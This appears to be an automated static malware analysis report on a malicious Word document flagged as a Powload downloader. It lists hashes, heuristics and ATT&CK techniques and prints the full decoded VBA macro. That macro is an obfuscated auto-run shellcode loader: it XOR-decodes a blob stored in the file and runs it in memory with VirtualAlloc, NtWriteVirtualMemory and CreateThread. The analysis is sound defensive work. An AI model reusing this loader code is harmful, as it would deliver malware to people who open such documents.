Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1596f730e2ceb4ae…

MALICIOUS

Office (OLE)

Size: 37.1 KB
Created: 2017-08-02 13:17:00
Authoring application: Microsoft Office Word
First seen: 2017-08-08
MD5: e9f20a370491c0123dec8187d102bb19
SHA-1: 0d03c681949fa3c82c66b639b1c4e7e4c3b6520c
SHA-256: 1596f730e2ceb4ae76997e3f806f0d1abf6e3174f4376c790cbfc93c455c99ee
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The file contains VBA macros, including a Document_Open macro, a common technique for initial execution. The script uses the VirtualAlloc and CreateThread API calls, suggesting it allocates memory and starts a new thread to execute shellcode or a downloaded payload. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' further indicates downloader functionality. The one embedded URL is confirmed benign, but the combination of auto-executing macros and memory-allocation API calls points to a malicious downloader.

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6809817-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
      Public Sub Document_Open()
          wKMqjhXCfXPLRIRMuC
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
      Sub Workbook_Open()
          Document_Open
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4722 bytes
SHA-256: a4e456809ed7e81072137d5d7eafda0d8a0afbcd2ef451c0207513e5131f3b74
Detection
ClamAV: No threats found
Obfuscation or payload: likely
38 of 72 identifiers look randomly generated (e.g. 'bWvtPmIZpcfJRCGQBBUckvbjiRQKfCDRiaCZqbtz') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function DoWgdpfqevxNegvMqER Lib "kernel32" Alias "CreateThread" (ByVal GEoKFCIpchbUfPPTTTAvdICs As Long, ByVal jyIwpvGcRGiFeARhWDElPaENp As Long, ByVal JoZKXcVTweZTNMvSniHnOsJohfXgb As LongPtr, TUgqMrchJ As Long, ByVal JkeNhdQS As Long, XMwgckqFLCRePSnkfMwadQfzA As Long) As LongPtr
Private Declare PtrSafe Function UsRCcr Lib "kernel32" Alias "VirtualAlloc" (ByVal NtHbvLGbVIqTxzalUcOFBY As Long, ByVal WMYSbzCmgIWQbB As LongPtr, ByVal EJxmvmGsxjBuACZbiPaLowTFCtvjk As Long, ByVal JZKVyehpDgptBIzfb As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hHNbaPKhQSKbRwhWABJFeU As LongPtr, ByVal TlUvVVkfxrLcDNIZUkqopFBpTmF As LongPtr, ByVal YvwFmNUP As String, ByVal uPmFMmK As LongPtr, ByRef uDiSCPu As LongPtr) As LongPtr
#Else
Private Declare Function DoWgdpfqevxNegvMqER Lib "kernel32" Alias "CreateThread"  (ByVal GEoKFCIpchbUfPPTTTAvdICs As Long, ByVal jyIwpvGcRGiFeARhWDElPaENp As Long, ByVal JoZKXcVTweZTNMvSniHnOsJohfXgb As Long, TUgqMrchJ As Long, ByVal JkeNhdQS As Long, XMwgckqFLCRePSnkfMwadQfzA As Long) As Long
Private Declare Function UsRCcr Lib "kernel32" Alias "VirtualAlloc" (ByVal NtHbvLGbVIqTxzalUcOFBY As Long, ByVal WMYSbzCmgIWQbB As Long, ByVal EJxmvmGsxjBuACZbiPaLowTFCtvjk As Long, ByVal JZKVyehpDgptBIzfb As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hHNbaPKhQSKbRwhWABJFeU As Long, ByVal TlUvVVkfxrLcDNIZUkqopFBpTmF As Long, ByVal YvwFmNUP As String, ByVal uPmFMmK As Long, ByRef uDiSCPu As Long) As Long
#End If

Const SFiHcKZpIoujuiuZN = &H1000
Const aqIXqAdHBZpnjgSAlifevuVdjJPp = &H40

Public Sub wKMqjhXCfXPLRIRMuC()
    Dim gnRUtWxRcFCGvyecvekdaSogXmwIe() As Byte

    gnRUtWxRcFCGvyecvekdaSogXmwIe = KMJpSSlVWDQzZTJLXiQWthnp(ActiveDocument.FullName)
    Dim hYjKXnEPtuLqUXDrumNGwIjzYnYLX As String
    hYjKXnEPtuLqUXDrumNGwIjzYnYLX = StrConv(gnRUtWxRcFCGvyecvekdaSogXmwIe, 64)
    
    Dim zPMdxDxL
    zPMdxDxL = Split(hYjKXnEPtuLqUXDrumNGwIjzYnYLX, "bWvtPmIZpcfJRCGQBBUckvbjiRQKfCDRiaCZqbtzVyFYiSWCmYGZWuUGUmlXvXUMyoAQaGzAiuhLQcaqVnxhWEVOgWf")

    Dim QyFLPrKYrCGSjUxCz As String
    Dim MjxXpLDuCzuHKBXFbop As String
    Dim kgKUvDewzMgiPFEfRX As String
    MjxXpLDuCzuHKBXFbop = StrConv(StrConv(zPMdxDxL(UBound(zPMdxDxL)), 64), 128)
    kgKUvDewzMgiPFEfRX = Mid$(MjxXpLDuCzuHKBXFbop, 3, Len(MjxXpLDuCzuHKBXFbop))

    QyFLPrKYrCGSjUxCz = PuukywTUkCpuSRqsFyDCMHhVPslSe("PvdXESAUsfC", kgKUvDewzMgiPFEfRX)
    
    #If VBA7 Then
        Dim TXTCDfWRUpH As LongPtr
        Dim ujaavenqUXlUJCFuFNG As LongPtr
    #Else
        Dim TXTCDfWRUpH As Long
        Dim ujaavenqUXlUJCFuFNG As Long
    #End If

    TXTCDfWRUpH = UsRCcr(0, Len(QyFLPrKYrCGSjUxCz), SFiHcKZpIoujuiuZN, aqIXqAdHBZpnjgSAlifevuVdjJPp)
    ujaavenqUXlUJCFuFNG = NtWriteVirtualMemory(-1, TXTCDfWRUpH, QyFLPrKYrCGSjUxCz, Len(QyFLPrKYrCGSjUxCz), 0)
    ujaavenqUXlUJCFuFNG = DoWgdpfqevxNegvMqER(0, 0, TXTCDfWRUpH, 0, 0, 0)
End Sub

Public Function KMJpSSlVWDQzZTJLXiQWthnp(ByVal iropUoBXPNYRBFMzUvhhR As String) As Byte()
    Dim MjxXpLDuCzuHKBXFbop As Long
    Dim kgKUvDewzMgiPFEfRX() As Byte
    MjxXpLDuCzuHKBXFbop = FreeFile
    If LenB(Dir(iropUoBXPNYRBFMzUvhhR)) Then
        Open iropUoBXPNYRBFMzUvhhR For Binary Access Read As MjxXpLDuCzuHKBXFbop
        ReDim kgKUvDewzMgiPFEfRX(LOF(MjxXpLDuCzuHKBXFbop) - 1&) As Byte
        Get MjxXpLDuCzuHKBXFbop, , kgKUvDewzMgiPFEfRX
        Close MjxXpLDuCzuHKBXFbop
    Else
        Err.Raise 53
    End If
    KMJpSSlVWDQzZTJLXiQWthnp = kgKUvDewzMgiPFEfRX
    Erase kgKUvDewzMgiPFEfRX
End Function

Public Sub Document_Open()
    wKMqjhXCfXPLRIRMuC
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function PuukywTUkCpuSRqsFyDCMHhVPslSe(RNdpAhPVlxBITTjsnqzmYHovminz As String, gkbPoLCqDrjDKmf As String) As String
    Dim eNnLx As Long
    Dim UtSYkyI As String
    Dim sTpAfm As Integer, SNgHXGyGcIEzBY As Integer, a As Long

    For eNnLx = 1 To Len(gkbPoLCqDrjDKmf)
        a = eNnLx Mod Len(RNdpAhPVlxBITTjsnqzmYHovminz)
        If a = 0 Then a = Len(RNdpAhPVlxBITTjsnqzmYHovminz)
        
        sTpAfm = Asc(Mid$(gkbPoLCqDrjDKmf, eNnLx, 1))
        SNgHXGyGcIEzBY = Asc(Mid$(RNdpAhPVlxBITTjsnqzmYHovminz, a, 1))
        UtSYkyI = UtSYkyI + Chr(sTpAfm Xor SNgHXGyGcIEzBY)
    Next eNnLx
    
   PuukywTUkCpuSRqsFyDCMHhVPslSe = UtSYkyI
End Function